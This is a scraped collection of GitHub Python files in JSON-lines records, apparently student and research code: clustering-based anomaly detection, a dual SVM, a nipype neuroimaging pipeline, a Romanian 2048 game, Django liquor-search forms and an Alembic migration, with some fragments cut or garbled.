Hierarchical(newCenter, clusters[min_id1], clusters[min_id2], newFlag, minDist)\r\n del clusters[min_id2]#删除这两条已经聚类的数据\r\n del clusters[min_id1]\r\n del centers[min_id2]#删除这两条已经聚类的数据的聚类中心\r\n del centers[min_id1]\r\n clusters.append(newCluster)#增加这两条数据聚类后的类\r\n centers.append(newCenter)#增加这两条数据聚类后的聚类中心,与对应的类保持对应\r\n finalCluster = [traverse(clusters[i]) for i in range(len(clusters))]#生成聚类结果\r\n finalCenters = centers#生成对应的聚类中心\r\n return finalCluster, finalCenters\r\n\r\ndef maxdists(cluster, centers):#计算各类中所有数据离聚类中心的距离和最大距离\r\n if len(cluster) != len(centers):\r\n print(sys.stderr, \"错误:聚类的数量和聚类中心的数量不一致!\")\r\n sys.exit(1)\r\n max_dist_list=[]\r\n dists_list=[]#数据离聚类中心的距离的列表\r\n for i in range(len(cluster)):\r\n dists_icluster=[]#保存每个数据离聚类中心的距离\r\n for j in range(len(cluster[i])):\r\n dist = 0\r\n max_dist=0\r\n for k in range(len(cluster[i][j])):#计算各个聚类的各个数据离聚类中心的距离\r\n dist += (cluster[i][j][k] - centers[i][k]) ** 2\r\n dist = math.sqrt(dist)\r\n dists_icluster.append(dist)#保存该数据离聚类中心的距离\r\n if dist>max_dist:\r\n max_dist=dist \r\n dists_list.append(dists_icluster)#第i个聚类的每个数据离聚类中心的距离的列表加入总距离列表\r\n max_dist_list.append(max_dist)#保存最大距离\r\n return max_dist_list,dists_list\r\n\r\ndef besthres(blackdata,rightdists,maxdists,centers):#确定最佳阈值\r\n thresholds=[]\r\n black_dists=[None]*len(centers)#黑样本距离列表初始化,将黑样本的距离根据最近的聚类中心划分,顺序与聚类中心列表对应\r\n for i in range(len(centers)):\r\n thresholds.append(-1)#将阈值列表初始化\r\n for i in range(len(blackdata)):#黑样本找到最接近的聚类中心\r\n min_dist=float('inf')#最小距离值的初始化\r\n for j in range(len(centers)):#计算黑样本离各个聚类中心的距离\r\n dist=distance(blackdata[i],centers[j]) \r\n if distthres:\r\n rightout_num+=1\r\n error_num=blackin_num*2+rightout_num#错误数量(黑样本当成正样本的数量加权,因为黑样本比较少,而且找出异常交易比将正常交易当成异常更加重要)\r\n if error_num 1e-6:\r\n plt.scatter(self.train_list[i]['x1'], self.train_list[i]['x2'], c = 'red', s = 10, label = 'a')\r\n b_a = self.train_list[i]['x2'] - k * self.train_list[i]['x1']\r\n else:\r\n plt.scatter(self.train_list[i]['x1'], self.train_list[i]['x2'], c = 'red', s = 1, label = 'a')\r\n else:\r\n if alpha[i] > 1e-6:\r\n plt.scatter(self.train_list[i]['x1'], self.train_list[i]['x2'], c = 'blue', s = 10, label = 'b')\r\n b_b = self.train_list[i]['x2'] - k * self.train_list[i]['x1']\r\n else:\r\n plt.scatter(self.train_list[i]['x1'], self.train_list[i]['x2'], c = 'blue', s = 1, label = 'b')\r\n\r\n plt.plot([-5, 5], [k * (-5) + b, k * 5 + b], c = 'green', linewidth = 3.0)\r\n plt.plot([-5, 5], [k * (-5) + b_a, k * 5 + b_a], c = 'green', linewidth = 1.0)\r\n plt.plot([-5, 5], [k * (-5) + b_b, k * 5 + b_b], c = 'green', linewidth = 1.0)\r\n\r\n # 画出测试样本\r\n for a in self.a_test:\r\n plt.scatter(a['x1'], a['x2'], c = 'red', s = 30, label = 'a', marker = '+')\r\n for b in self.b_test:\r\n plt.scatter(b['x1'], b['x2'], c = 'blue', s = 30, label = 'b', marker = '+')\r\n\r\n plt.xlabel(\"x1\", fontdict = {'size': 16})\r\n plt.ylabel(\"x2\", fontdict = {'size': 16})\r\n\r\n def train(self):\r\n N = len(self.a_train) + len(self.b_train) # 计算样本个数\r\n Q = np.mat(np.arange(N))\r\n for i in range(N):\r\n q = []\r\n for j in range(N):\r\n q.append(self.train_list[i]['y'] * self.train_list[j]['y'] * (\r\n self.train_list[i]['x1'] * self.train_list[j]['x1'] + self.train_list[i]['x2'] *\r\n self.train_list[j]['x2'])) # 计算出Q每一行的每一个元素\r\n Q = np.r_[Q, np.mat(q)]\r\n Q_array = np.array(Q)\r\n print(Q_array)\r\n # np.delete(Q_array, 0, 0) # 删除第一行,mat不能被操作,只有array可以被操作\r\n Q = matrix(Q_array[1:][:])\r\n print('Q')\r\n print(Q)\r\n print()\r\n\r\n # 计算行向量p,p是一个1*n的向量\r\n p = []\r\n for i in range(N):\r\n p.append(-1.0)\r\n p = matrix(p)\r\n print('p')\r\n print(p)\r\n print()\r\n\r\n # 得到A矩阵,A是N*N的单位阵\r\n A = np.zeros((N, N))\r\n A_array = np.array(A)\r\n for i in range(N):\r\n A_array[i][i] = -1.0\r\n A = matrix(A_array)\r\n print('A')\r\n print(A)\r\n print()\r\n\r\n c = matrix(np.zeros((1, N)).T)\r\n print('c')\r\n print(c)\r\n print()\r\n\r\n # 生成r矩阵\r\n r_list = []\r\n for t in self.train_list:\r\n r_list.append(float(t['y']))\r\n r = matrix(r_list).T\r\n print('r')\r\n print(r)\r\n print()\r\n\r\n v = matrix(0.0)\r\n print('v')\r\n print(v)\r\n print()\r\n\r\n solvers.options['show_progress'] = False\r\n sol = solvers.qp(Q, p, A, c, r, v)\r\n print(sol['x'])\r\n print(sol['y'])\r\n alpha = sol['x']\r\n w = matrix([0.0, 0.0])\r\n for i in range(N):\r\n w = w + alpha[i] * self.train_list[i]['y'] * matrix([\r\n self.train_list[i]['x1'], self.train_list[i]['x2']])\r\n self.w = w\r\n for i in range(N):\r\n if alpha[i, 0] > 1e-6:\r\n b = self.train_list[i]['y'] - self.w.T * matrix([\r\n self.train_list[i]['x1'], self.train_list[i]['x2']])\r\n self.b = b[0, 0]\r\n break\r\n\r\n print(alpha)\r\n\r\n self.draw(b, alpha)\r\n\r\n # print(alpha)\r\n\r\n def get_train_acc(self, a_train, b_train):\r\n self.train_accu = len(a_train) + len(b_train)\r\n for i in range(0, len(a_train)):\r\n t = a_train[i]['x1'] * self.w[0, 0] + a_train[i]['x2'] * self.w[1, 0] + a_train[i]['bias'] * self.b\r\n\r\n if t > 0:\r\n a_train[i]['y_'] = 1\r\n elif t < 0:\r\n a_train[i]['y_'] = -1\r\n else:\r\n a_train[i]['y_'] = 0\r\n\r\n if a_train[i]['y'] != a_train[i]['y_']:\r\n self.train_accu = self.train_accu - 1\r\n\r\n for i in range(0, len(b_train)):\r\n t = b_train[i]['x1'] * self.w[0, 0] + b_train[i]['x2'] * self.w[1, 0] + b_train[i]['bias'] * self.b\r\n if t > 0:\r\n b_train[i]['y_'] = 1\r\n elif t < 0:\r\n b_train[i]['y_'] = -1\r\n else:\r\n b_train[i]['y_'] = 0\r\n\r\n if b_train[i]['y'] != b_train[i]['y_']:\r\n self.train_accu = self.train_accu - 1\r\n print('\\nThe train accuracy is ' + str(self.train_accu / self.each_train_num / 2))\r\n\r\n def test(self, a_test, b_test):\r\n self.test_accu = len(a_test) + len(b_test)\r\n for i in range(0, len(a_test)):\r\n t = a_test[i]['x1'] * self.w[0, 0] + a_test[i]['x2'] * self.w[1, 0] + a_test[i]['bias'] * self.b\r\n\r\n if t > 0:\r\n a_test[i]['y_'] = 1\r\n elif t < 0:\r\n a_test[i]['y_'] = -1\r\n else:\r\n a_test[i]['y_'] = 0\r\n\r\n if a_test[i]['y'] != a_test[i]['y_']:\r\n self.test_accu = self.test_accu - 1\r\n\r\n for i in range(0, len(b_test)):\r\n t = b_test[i]['x1'] * self.w[0, 0] + b_test[i]['x2'] * self.w[1, 0] + b_test[i]['bias'] * self.b\r\n if t > 0:\r\n b_test[i]['y_'] = 1\r\n elif t < 0:\r\n b_test[i]['y_'] = -1\r\n else:\r\n b_test[i]['y_'] = 0\r\n\r\n if b_test[i]['y'] != b_test[i]['y_']:\r\n self.test_accu = self.test_accu - 1\r\n print('\\nThe test accuracy is ' + str(self.test_accu / self.each_test_num / 2))\r\n\r\n\r\ndemo = Dual_SVM()\r\n","repo_name":"Liwen-Xiao/Pattern_Recognization_and_Machine_Learning","sub_path":"SVM/Dual_SVM.py","file_name":"Dual_SVM.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71812513795","text":"import os\n\n#=============================================================================\n# Setup: import libraries, set file paths, and initialize main workflow\n#=============================================================================\n#-----------------------------------------------------------------------------\n# Paths\n#-----------------------------------------------------------------------------\n# images_path is the beginning of the path not in the text of image_list file\ndata_path = '/homedir/Data/EMBARC/Data'\nresults_path = data_path\ntemp_path = data_path\nscratch = 'Scratch'\n#-----------------------------------------------------------------------------\n# Data to run\n#-----------------------------------------------------------------------------\nprocess_dmri = True # structural or diffusion data?\n#-----------------------------------------------------------------------------\n# Settings\n#-----------------------------------------------------------------------------\nrun_bet = False\nprocess_phantoms = True #False # phantom or human data?\nmax_angle = 90\nif process_dmri:\n temp_path = os.path.join(temp_path, 'Scratch_dmri')\n results_path_name = 'Results_dmri'\nelse:\n temp_path = os.path.join(temp_path, 'Scratch')\n results_path_name = 'Results_adni'\nif process_dmri:\n threshold_value = 0 #0.3\n interp = 'nearestneighbour'\nelse:\n threshold_value = 0\n interp = 'trilinear'\n#-----------------------------------------------------------------------------\n# Lists of images to process\n#-----------------------------------------------------------------------------\nif process_phantoms:\n if process_dmri:\n images_path = os.path.join(data_path, 'phantoms_dmri')\n image_list = os.path.join(data_path, 'phantoms_dmri_FA.txt')\n reg_images_path = os.path.join(data_path, 'phantoms_dmri')\n reg_image_list = os.path.join(data_path, 'phantoms_dmri_1stvol.txt')\n output_path = os.path.join(results_path, 'phantoms_dmri')\n else:\n images_path = os.path.join(data_path, 'phantoms_adni')\n image_list = os.path.join(data_path, 'phantoms_adni.txt')\n reg_images_path = images_path\n reg_image_list = image_list\n output_path = os.path.join(results_path, 'phantoms_adni')\nelse:\n if process_dmri:\n images_path = os.path.join(data_path, 'dmri_FA')\n image_list = os.path.join(data_path, 'dmri_FA_file_list.txt')\n reg_images_path = os.path.join(data_path, 'dmri_1stvol')\n reg_image_list = os.path.join(data_path, 'dmri_1stvol_file_list.txt')\n output_path = os.path.join(results_path, 'dmri')\n else:\n images_path = os.path.join(data_path, 'brains_n3')\n image_list = os.path.join(data_path, 'brain_file_list.txt')\n reg_images_path = images_path\n reg_image_list = image_list\n output_path = os.path.join(results_path, 'mri')\n\n\n#-----------------------------------------------------------------------------\n# Steps to run\n#-----------------------------------------------------------------------------\ndo_register_images_to_ref_images = True\ndo_compute_image_similarities = True\ndo_compare_image_histograms = True\ndo_threshold_images = False\ndo_compute_image_overlaps = False\n#-----------------------------------------------------------------------------\n# Import system and nipype Python libraries\n#-----------------------------------------------------------------------------\nfrom nipype.pipeline.engine import Workflow, Node\nfrom nipype.interfaces.utility import Function as Fn\nfrom nipype.interfaces.io import DataSink\n#-----------------------------------------------------------------------------\n# Import Mindboggle Python libraries\n#-----------------------------------------------------------------------------\nfrom mindboggle.utils.compute import pairwise_vector_distances\nfrom mindboggle.evaluate.compare_images import compute_image_histograms, \\\n compute_image_similarities, compute_image_overlaps, \\\n register_images_to_ref_images, apply_transforms, threshold_images\n#-------------------------------------------------------------------------------\n# Initialize workflows\n#-------------------------------------------------------------------------------\nFlow = Workflow(name=scratch)\nFlow.base_dir = temp_path\nif not os.path.isdir(temp_path):\n os.makedirs(temp_path)\n#-----------------------------------------------------------------------------\n# Inputs and Outputs\n#-----------------------------------------------------------------------------\nfid = open(image_list)\nfile_list = fid.read()\nfile_list = file_list.splitlines()\nfile_list = [os.path.join(images_path, x.strip()) for x in file_list if len(x)]\nfid_reg = open(reg_image_list)\nreg_file_list = fid_reg.read()\nreg_file_list = reg_file_list.splitlines()\nreg_file_list = [os.path.join(reg_images_path, x.strip()) for x in reg_file_list if len(x)]\nSink = Node(DataSink(), name = results_path_name)\nSink.inputs.base_directory = output_path\nSink.inputs.container = results_path_name\nif not os.path.isdir(output_path): os.makedirs(output_path)\n\n#=============================================================================\n# Preprocessing\n#=============================================================================\ndef run_bet_on_files(infiles, f_value=0.5):\n \"\"\"\n Run FSL's bet (brain extraction tool).\n\n Parameters\n ----------\n infiles : names of input files\n indirectory : name of input directory\n f_value : float\n\n \"\"\"\n import os\n from nipype.interfaces.base import CommandLine\n\n outfiles = []\n for infile in infiles:\n outfile = os.path.join(os.getcwd(), 'brain_' + os.path.basename(infile))\n outfiles.append(outfile)\n\n cli = CommandLine(command = 'bet2')\n cli.inputs.args = ' '.join([infile, outfile, 'f_value' + str(f_value)])\n cli.cmdline\n cli.run()\n\n return outfiles\n\nif run_bet:\n\n bet = Node(name = 'Extract_brains',\n interface = Fn(function = run_bet_on_files,\n iterfield=['infiles'],\n input_names = ['infiles',\n 'f_value'],\n output_names = ['outfiles']))\n Flow.add_nodes([bet])\n bet.inputs.infiles = file_list\n bet.inputs.f_value = 0.25\n Flow.connect([(bet, Sink, [('outfiles', 'brains')])])\n\n#=============================================================================\n# Comparisons\n#=============================================================================\n#-------------------------------------------------------------------------------\n# Compare image histograms\n# The images from which the histograms were derived do not need to be coregistered.\n#-------------------------------------------------------------------------------\nif do_compare_image_histograms:\n compute_histograms = Node(name = 'Compute_histograms',\n interface = Fn(function = compute_image_histograms,\n iterfield=['infiles'],\n input_names = ['infiles',\n 'nbins',\n 'threshold'],\n output_names = ['histogram_values']))\n Flow.add_nodes([compute_histograms])\n if run_bet:\n Flow.connect([(bet, compute_histograms, [('outfiles','infiles')])])\n else:\n compute_histograms.inputs.infiles = file_list\n compute_histograms.inputs.nbins = 100\n compute_histograms.inputs.threshold = 0\n\n compare_histograms = Node(name = 'Compare_histograms',\n interface = Fn(function = pairwise_vector_distances,\n input_names = ['vectors',\n 'save_file',\n 'normalize'],\n output_names = ['vector_distances',\n 'outfile']))\n Flow.add_nodes([compare_histograms])\n Flow.connect([(compute_histograms, compare_histograms,\n [('histogram_values','vectors')])])\n compare_histograms.inputs.save_file = True\n compare_histograms.inputs.normalize = True\n\n Flow.connect([(compare_histograms, Sink, [('outfile', 'histograms')])])\n\n#-------------------------------------------------------------------------------\n# Register each image to a reference image\n#-------------------------------------------------------------------------------\nif do_register_images_to_ref_images:\n register = Node(name = 'Register',\n interface = Fn(function = register_images_to_ref_images,\n input_names = ['files',\n 'ref_file_index',\n 'max_angle',\n 'flirt_command'],\n output_names = ['outfiles']))\n Flow.add_nodes([register])\n if run_bet:\n Flow.connect([(bet, register, [('outfiles','files')])])\n else:\n register.inputs.files = reg_file_list\n register.inputs.ref_file_index = 1\n register.inputs.max_angle = max_angle\n register.inputs.flirt_command = 'flirt.fsl'\n #Flow.connect([(register, Sink, [('outfiles', 'registrations.@transforms')])])\n\n transform = Node(name = 'Transform',\n interface = Fn(function = apply_transforms,\n input_names = ['files',\n 'ref_file_index',\n 'transform_files',\n 'interp',\n 'flirt_command'],\n output_names = ['outfiles']))\n Flow.add_nodes([transform])\n if run_bet:\n Flow.connect([(bet, transform, [('outfiles','files')])])\n else:\n transform.inputs.files = file_list\n transform.inputs.ref_file_index = 1\n Flow.connect([(register, transform, [('outfiles', 'transform_files')])])\n transform.inputs.interp = interp\n transform.inputs.flirt_command = 'flirt.fsl'\n Flow.connect([(transform, Sink, [('outfiles', 'registrations.@images')])])\n\n#-------------------------------------------------------------------------------\n# Threshold images\n#-------------------------------------------------------------------------------\nif do_threshold_images:\n threshold = Node(name = 'Threshold',\n interface = Fn(function = threshold_images,\n input_names = ['files',\n 'threshold_value',\n 'save_files'],\n output_names = ['outfiles']))\n Flow.add_nodes([threshold])\n Flow.connect([(transform, threshold, [('outfiles', 'files')])])\n threshold.inputs.threshold_value = threshold_value\n threshold.inputs.save_files = True\n Flow.connect([(threshold, Sink, [('outfiles', 'thresholds')])])\n\n#-------------------------------------------------------------------------------\n# Compute image similarities\n#-------------------------------------------------------------------------------\nif do_compute_image_similarities:\n similarity = Node(name = 'Similarity',\n interface = Fn(function = compute_image_similarities,\n input_names = ['files',\n 'intersect_masks',\n 'metric',\n 'save_file'],\n output_names = ['pairwise_similarities',\n 'outfile']))\n Flow.add_nodes([similarity])\n if do_threshold_images:\n Flow.connect([(threshold, similarity, [('outfiles', 'files')])])\n else:\n Flow.connect([(transform, similarity, [('outfiles', 'files')])])\n similarity.inputs.intersect_masks = True\n similarity.inputs.metric = 'cc'\n similarity.inputs.save_file = True\n Flow.connect([(similarity, Sink, [('outfile', 'similarities')])])\n\n#-------------------------------------------------------------------------------\n# Compute image overlaps\n#-------------------------------------------------------------------------------\nif do_compute_image_overlaps:\n overlaps = Node(name = 'Overlaps',\n interface = Fn(function = compute_image_overlaps,\n input_names = ['files',\n 'list_of_labels',\n 'save_file'],\n output_names = ['pairwise_overlaps',\n 'outfile']))\n Flow.add_nodes([overlaps])\n Flow.connect([(threshold, overlaps, [('outfiles', 'files')])])\n overlaps.inputs.list_of_labels = [1]\n overlaps.inputs.save_file = True\n Flow.connect([(overlaps, Sink, [('outfile', 'overlaps')])])\n\n##############################################################################\nif __name__== '__main__':\n #Flow.write_graph(graph2use='flat')\n #Flow.write_graph(graph2use='hierarchical')\n Flow.run()\n","repo_name":"binarybottle/mindboggle_sidelined","sub_path":"compare_images_pipeline.py","file_name":"compare_images_pipeline.py","file_ext":"py","file_size_in_byte":13593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73807158595","text":"import random\r\ndef incepe_jocul():\r\n mat =[]\r\n for i in range(4):\r\n mat.append([0]*4)\r\n print(\"Comenzile sunt urmatoarele:\")\r\n print(\"W sau w pentru a merge in sus\")\r\n print(\"S sau s pentru a merge in jos\")\r\n print(\"A sau a pentru a merge la stanga\")\r\n print(\"D sau d pentru a merge la dreapta\")\r\n adauga_nou_2(mat)\r\n return mat\r\ndef adauga_nou_2(mat):\r\n r = random.randint(0, 3)\r\n c = random.randint(0, 3)\r\n while(mat[r] !=0):\r\n r = random.randint(0, 3)\r\n c = random.randint(0, 3)\r\n mat[r]=2\r\ndef status_joc(mat):\r\n for i in range(4):\r\n for j in range(4):\r\n if(mat[i][j]== 2048):\r\n return 'Ai castigat!'\r\n for i in range(4):\r\n for j in range(4):\r\n if(mat[i][j]== 0):\r\n return 'Jocul nu s-a terminat'\r\n for i in range(3):\r\n for j in range(3):\r\n if(mat[i][j]== mat[i+1][j] or mat[i][j]== mat[i][j+1]):\r\n return 'Jocul nu s-a terminat'\r\n for j in range(3):\r\n if(mat[3][j]== mat[3][j+1]):\r\n return 'Jocul nu s-a terminat'\r\n for i in range(3):\r\n if(mat[i][3]== mat[i+1][3]):\r\n return 'Jocul nu s-a terminat'\r\n return 'Ai pierdut'\r\ndef compresie(mat):\r\n changed = False\r\n nou_mat= []\r\n for i in range(4):\r\n nou_mat.append([0] * 4)\r\n for i in range(4):\r\n pos = 0\r\n for j in range(4):\r\n pos = 0\r\n for j in range(4):\r\n if(mat[i][j] !=0):\r\n nou_mat[i][pos]=mat[i][j]\r\n if(j != pos):\r\n changed = True\r\n pos += 1\r\n return nou_mat , changed\r\ndef schmb(mat):\r\n changed = False\r\n for i in range(4):\r\n for j in range(3):\r\n if(mat[i][j] == mat[i][j+1] and mat[i][j] != 0):\r\n mat[i][j] = mat[i][j] * 2\r\n mat[i][j+1] = 0\r\n changed = True\r\n return mat, changed\r\ndef inversare(mat):\r\n nou_mat =[]\r\n for i in range(4):\r\n nou_mat.append([])\r\n for j in range(4):\r\n new_mat[i].append(mat[i][3-j])\r\n return nou_mat\r\ndef transp(mat):\r\n nou_mat =[]\r\n for i in range(4):\r\n nou_mat.append([])\r\n for j in range(4):\r\n nou_mat[i].append(mat[j][i])\r\n return nou_mat\r\ndef mrg_stanga(grid):\r\n nou_mat, changed1 = compresie(grid)\r\n nou_mat, changed2 = schmb(nou_grid)\r\n changed = changed1 or changed2\r\n nou_grid, temp = compresie(nou_grid)\r\n return nou_grid, changed\r\ndef mrg_dreapta(grid):\r\n nou_grid = inversare(grid)\r\n nou_grid, changed = mrg_stanga(nou_grid)\r\n nou_grid = inversare(nou_grid)\r\n return nou_grid, chnaged\r\ndef mrg_sus(grid):\r\n nou_grid = transp(grid)\r\n nou_grid, changed = mrg_stanga(nou_grid)\r\n nou_grid = transp(nou_grid)\r\n return nou_grid, changed\r\ndef mrg_jos(grid):\r\n nou_grid = transp(grid)\r\n nou_grid, changed = mrg_dreapta(nou_grid)\r\n nou_grid = transp(nou_grid)\r\n return nou_grid, changed\r\n","repo_name":"mario221098/proiect-lp2","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39977554947","text":"\"\"\"Change view.ip to session_id\n\nRevision ID: ad8901675aaf\nRevises: 100960102822\nCreate Date: 2020-03-14 13:24:08.400161\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'ad8901675aaf'\ndown_revision = '100960102822'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('view', sa.Column('session_id', sa.String(length=200), nullable=True))\n op.drop_column('view', 'ip')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('view', sa.Column('ip', mysql.VARCHAR(collation='utf8mb4_unicode_ci', length=15), nullable=True))\n op.drop_column('view', 'session_id')\n # ### end Alembic commands ###\n","repo_name":"treetrnk/webserialist.com","sub_path":"migrations/versions/ad8901675aaf_change_view_ip_to_session_id.py","file_name":"ad8901675aaf_change_view_ip_to_session_id.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"862515061","text":"# -*- coding: utf-8 -*-\nfrom django import forms\n\n\nclass VarenavnForm(forms.Form):\n varenavn = forms.CharField(max_length=80, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n\nclass VaretypeForm(forms.Form):\n CHOICES = (\n ('Akevitt', 'Akevitt'),\n ('Portvin', 'Portvin'),\n ('Vodka', 'Vodka'),\n ('Druebrennevin', 'Druebrennevin'),\n ('Whisky', 'Whisky'),\n ('Likør', 'Likør'),\n ('Genever', 'Genever'),\n ('Gin', 'Gin'),\n ('Bitter', 'Bitter'),\n ('Fruktbrennevin', 'Fruktbrennevin'),\n ('Vermut', 'Vermut'),\n ('Aromatisert vin', 'Aromatisert vin'),\n ('Brennevin. annet', 'Brennevin. annet'),\n ('Sherry', 'Sherry'),\n ('Rødvin', 'Rødvin'),\n ('Hvitvin', 'Hvitvin'),\n ('Perlende vin. rosé', 'Perlende vin. rosé'),\n ('Champagne. brut', 'Champagne. brut'),\n ('Champagne. sec', 'Champagne. sec'),\n ('Musserende vin. rosé', 'Musserende vin. rosé'),\n ('Champagne. rosé', 'Champagne. rosé'),\n ('Musserende vin', 'Musserende vin'),\n ('Alkoholfri most', 'Alkoholfri most'),\n ('Alkoholfritt. øvrig', 'Alkoholfritt. øvrig'),\n ('Rosévin', 'Rosévin'),\n ('Porter & stout', 'Porter & stout'),\n ('Alkoholfritt øl', 'Alkoholfritt øl'),\n ('Champagne extra brut', 'Champagne extra brut'),\n ('India pale ale', 'India pale ale'),\n ('Saison farmhouse ale', 'Saison farmhouse ale'),\n ('Lys ale', 'Lys ale'),\n ('Rom', 'Rom'),\n ('Klosterstil', 'Klosterstil'),\n ('Spesial', 'Spesial'),\n ('Mørk lager', 'Mørk lager'),\n ('Barley wine', 'Barley wine'),\n ('Hveteøl', 'Hveteøl'),\n ('Pale ale', 'Pale ale'),\n ('Perlende vin. rød', 'Perlende vin. rød'),\n ('Sterkvin. annen', 'Sterkvin. annen'),\n ('Fruktvin', 'Fruktvin'),\n ('Sider', 'Sider'),\n ('Perlende vin. hvit', 'Perlende vin. hvit'),\n ('Brown ale', 'Brown ale'),\n ('Alkoholfri vin', 'Alkoholfri vin'),\n ('Alkoholfri musserende drikk', 'Alkoholfri musserende drikk'),\n ('Lys lager', 'Lys lager'),\n ('Alkoholfri leskedrikk', 'Alkoholfri leskedrikk'),\n ('Red/amber', 'Red/amber'),\n ('Sake', 'Sake'),\n ('Surøl', 'Surøl'),\n ('Madeira', 'Madeira'),\n ('Mjød', 'Mjød'),\n ('Brennevin. nøytralt < 37.5 %', 'Brennevin. nøytralt < 37.5 %'),\n ('Champagne. annen', 'Champagne. annen'),\n )\n varetype = forms.MultipleChoiceField(label='', choices=CHOICES,\n widget=forms.SelectMultiple(\n attrs={'class': 'selectpicker', 'title': 'Velg varetyper'}),\n required=False)\n\n\nclass PrisForm(forms.Form):\n pris_0 = forms.DecimalField(required=False, label='',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n pris_1 = forms.DecimalField(required=False, label='',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n\nclass VolumForm(forms.Form):\n volum_0 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n volum_1 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n\nclass AlkoholForm(forms.Form):\n alkohol_0 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n alkohol_1 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n\nclass EnhetsprisForm(forms.Form):\n enhetspris_0 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n enhetspris_1 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n\nclass LandForm(forms.Form):\n land = forms.CharField(label='', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n\nclass ProdusentForm(forms.Form):\n produsent = forms.CharField(label='', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n\nclass Butikkategoriform(forms.Form):\n butikkategori = forms.CharField(label='', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': 'Kategori 1-7'}))\n\n\nclass SorteringsForm(forms.Form):\n CHOICES = (\n ('enhetspris', 'enhetspris'),\n ('-enhetspris', '-enhetspris'),\n ('alkohol', 'alkohol'),\n ('-alkohol', '-alkohol'),\n ('volum', 'volum'),\n ('-volum', '-volum'),\n ('pris', 'pris'),\n ('-pris', '-pris'),\n ('varetype', 'varetype'),\n ('-varetype', '-varetype'),\n ('varenavn', 'varenavn'),\n ('-varenavn', '-varenavn'),\n )\n o = forms.ChoiceField(\n choices=CHOICES,\n label='',\n required=False\n )\n\n\nclass BolForm(forms.Form):\n groups = (\n ('ol', 'ol'),\n ('sprit', 'sprit'),\n ('aperitif-dessert', 'aperitif-dessert'),\n ('mousserande-viner', 'mousserande-viner'),\n ('roda-viner', 'roda-viner'),\n ('cider-och-blanddrycker', 'cider-och-blanddrycker'),\n ('vita-viner', 'vita-viner'),\n ('alkoholfritt', 'alkoholfritt'),\n )\n\n sortChoices = (\n 'alcoholPrice',\n '-alcoholPrice',\n 'name',\n '-name',\n 'group',\n '-group',\n 'price',\n '-price',\n 'volume',\n '-volume',\n 'alcohol',\n '-alcohol',\n )\n navn = forms.CharField(max_length=80, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n kategori = forms.MultipleChoiceField(label='', choices=groups,\n widget=forms.SelectMultiple(\n attrs={'class': 'selectpicker', 'title': 'Velg kategori'}),\n required=False)\n\n pris_0 = forms.DecimalField(required=False, label='',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n pris_1 = forms.DecimalField(required=False, label='',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n volum_0= forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n volum_1 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n alkohol_0= forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n alkohol_1 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n alkoholpris_0 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n alkoholpris_1 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n land = forms.CharField(label='', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n produsent = forms.CharField(label='', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n o = forms.ChoiceField(\n choices=sortChoices,\n label='',\n required=False\n )\n","repo_name":"simennj/polside","sub_path":"pol/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":8649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3992701407","text":"from keras.applications import VGG16\r\nconv_base = VGG16(weights='imagenet', \r\n include_top=False, # do we need a classificator for 1000 types\r\n input_shape=(150, 